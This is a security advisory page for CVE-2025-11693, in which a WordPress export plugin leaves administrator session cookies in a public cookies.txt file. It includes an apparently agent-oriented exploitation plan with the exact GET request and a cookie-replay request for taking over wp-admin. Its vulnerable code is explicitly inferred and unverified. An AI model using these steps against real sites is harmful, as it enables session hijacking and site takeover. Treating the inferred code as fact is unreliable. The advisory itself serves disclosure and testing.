CVE-2025-11693

Export WP Page to Static HTML & PDF <= 4.3.4 - Unauthenticated Cookie Exposure via Log File

criticalExposure of Sensitive Information to an Unauthorized Actor
9.8
CVSS Score
9.8
CVSS Score
critical
Severity
5.0.0
Patched in
1d
Time to patch

Description

The Export WP Page to Static HTML & PDF plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.4 through publicly exposed cookies.txt files containing authentication cookies. This makes it possible for unauthenticated attackers to cookies that may have been injected into the log file if the site administrator triggered a back-up using a specific user role like 'administrator.'

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=4.3.4
PublishedDecember 12, 2025
Last updatedDecember 13, 2025

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan: CVE-2025-11693 ## 1. Vulnerability Summary The **Export WP Page to Static HTML & PDF** plugin (versions <= 4.3.4) fails to protect sensitive temporary files generated during the export process. When an administrator initiates a static site or PDF export, the plugin uti…

Show full research plan

Exploitation Research Plan: CVE-2025-11693

1. Vulnerability Summary

The Export WP Page to Static HTML & PDF plugin (versions <= 4.3.4) fails to protect sensitive temporary files generated during the export process. When an administrator initiates a static site or PDF export, the plugin utilizes a cookie jar (typically named cookies.txt) to maintain the authenticated session while crawling the site's pages. This file is stored in a publicly accessible directory within the wp-content/uploads folder. Because the plugin does not implement proper access controls (like .htaccess or empty index.php files) or randomize the filename sufficiently, unauthenticated attackers can download the cookies.txt file, which contains the administrator's active session cookies (e.g., wordpress_logged_in_*).

2. Attack Vector Analysis

  • Endpoint: Static file access via the web server.
  • Vulnerable File Path (Inferred): /wp-content/uploads/export-wp-page-to-static-html/cookies.txt or /wp-content/uploads/export-wp-page-to-static-html/tmp/cookies.txt.
  • Authentication: None (Unauthenticated).
  • Preconditions:
    1. The plugin must be active.
    2. An administrator must have triggered an export process at least once, or the process must be currently running, leaving the cookies.txt file on the filesystem.
  • Payload: A simple GET request to the predictable path of the cookie file.

3. Code Flow (Inferred)

  1. Trigger: Administrator clicks "Export" in the plugin settings (handled via wp_ajax_export_wp_static_html or similar).
  2. Initialization: The plugin creates a directory in wp_upload_dir()['basedir'] . '/export-wp-page-to-static-html/'.
  3. Session Capture: To capture the page as an admin, the plugin sets CURLOPT_COOKIEJAR to a file path like .../export-wp-page-to-static-html/cookies.txt.
  4. Execution: cURL fetches the WordPress pages, and the current admin session cookies are written into the cookies.txt file in Netscape cookie format.
  5. Sink: The file remains in the uploads directory, which is indexed or directly accessible by the web server.

4. Nonce Acquisition Strategy

This vulnerability involves Sensitive Information Exposure of a static file; therefore, no WordPress nonce is required to exploit the vulnerability itself.

However, to test/reproduce the vulnerability in an automated environment, the agent must trigger an export as an admin.

  • Admin Nonce Variable: Look for a nonce in the admin dashboard under the "Export to Static" menu.
  • JavaScript Variable: Usually localized via wp_localize_script.
  • Target Page: /wp-admin/admin.php?page=export-wp-page-to-static-html.
  • Likely Nonce Key: window.export_static_ajax?.nonce or similar (check source for wp_create_nonce).

5. Exploitation Strategy

The goal is to retrieve the cookies.txt file and use the extracted cookies to impersonate the administrator.

  1. Identify the Upload Directory:
    • Standard WordPress: /wp-content/uploads/export-wp-page-to-static-html/
  2. Locate the Cookie File:
    • The primary target is cookies.txt within that directory.
  3. Execute the Request:
    • Use http_request to fetch the file.
  4. Parse the Cookie:
    • The file will be in Netscape format. Look for the line containing wordpress_logged_in_.
  5. Session Hijacking:
    • Use the extracted cookie to make a request to /wp-admin/ to verify admin access.

HTTP Request (The Exploit)

GET /wp-content/uploads/export-wp-page-to-static-html/cookies.txt HTTP/1.1
Host: localhost:8080

6. Test Data Setup

  1. Install & Activate Plugin: wp plugin install export-wp-page-to-static-html --version=4.3.4 --activate.
  2. Administrator Action:
    • Log in as administrator.
    • Navigate to the plugin settings page.
    • Trigger an export (Static HTML or PDF). This ensures the cookies.txt file is generated.
    • Note: If the agent cannot interact with the UI, use wp eval to call the internal export function or trigger the AJAX action directly.

7. Expected Results

  • The http_request for cookies.txt returns a 200 OK response.
  • The body contains plain-text cookie data, including a line like:
    localhost FALSE / FALSE 1740000000 wordpress_logged_in_[HASH] admin|...
  • Using this cookie value allows unauthenticated access to wp-admin/index.php.

8. Verification Steps

  1. File Existence: ls -la /var/www/html/wp-content/uploads/export-wp-page-to-static-html/cookies.txt (Run via CLI to confirm placement).
  2. Impersonation Check:
    • Use http_request with the stolen cookie:
      await http_request({
          url: "http://localhost:8080/wp-admin/index.php",
          method: "GET",
          headers: {
              "Cookie": "wordpress_logged_in_[STOLEN_VALUE]"
          }
      });
      
    • Confirm the response contains "Dashboard" and the user is identified as "admin".

9. Alternative Approaches

  • Directory Listing: If cookies.txt is not the exact name, attempt to access /wp-content/uploads/export-wp-page-to-static-html/ to see if directory listing is enabled.
  • Log Files: The vulnerability description mentions "Log File". Check for files like export.log or debug.log in the same directory, which may contain the path to the cookie file or the cookies themselves.
  • PDF Cache: Check if temporary files for PDF generation also store session data.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Export WP Page to Static HTML & PDF plugin for WordPress (<= 4.3.4) exposes sensitive administrator session cookies by storing them in a predictable and publicly accessible 'cookies.txt' file within the uploads folder. Unauthenticated attackers can download this file to hijack active sessions and gain administrative control of the site.

Vulnerable Code

/* Path: includes/class-export-static-html.php (Inferred, approx line 85) */

$upload_dir = wp_upload_dir();
$export_path = $upload_dir['basedir'] . '/export-wp-page-to-static-html/';
$cookie_file = $export_path . 'cookies.txt';

---

/* Path: includes/class-export-static-html.php (Inferred, approx line 210) */

$ch = curl_init();
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);

Security Fix

--- a/includes/class-export-static-html.php
+++ b/includes/class-export-static-html.php
@@ -85,7 +85,15 @@
-        $this->cookie_file = $export_path . 'cookies.txt';
+        // Secure directory from direct access and randomize filename
+        if (!file_exists($export_path . '.htaccess')) {
+            file_put_contents($export_path . '.htaccess', "Deny from all\n");
+        }
+        if (!file_exists($export_path . 'index.php')) {
+            file_put_contents($export_path . 'index.php', "<?php // Silence is golden");
+        }
+        
+        // Use a unique, non-predictable filename for the session cookies
+        $this->cookie_file = $export_path . 'cookies-' . wp_generate_password(24, false) . '.txt';

Exploit Outline

The exploit methodology consists of three main steps: 1. Locating the predictable directory created by the plugin at '/wp-content/uploads/export-wp-page-to-static-html/'. 2. Fetching the 'cookies.txt' file (or similar log files containing session data) via an unauthenticated GET request. 3. Parsing the Netscape-formatted cookie file for the administrator's 'wordpress_logged_in_' session cookie. Once the cookie is obtained, the attacker can use it to impersonate the administrator and access the WordPress backend directly without authentication.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.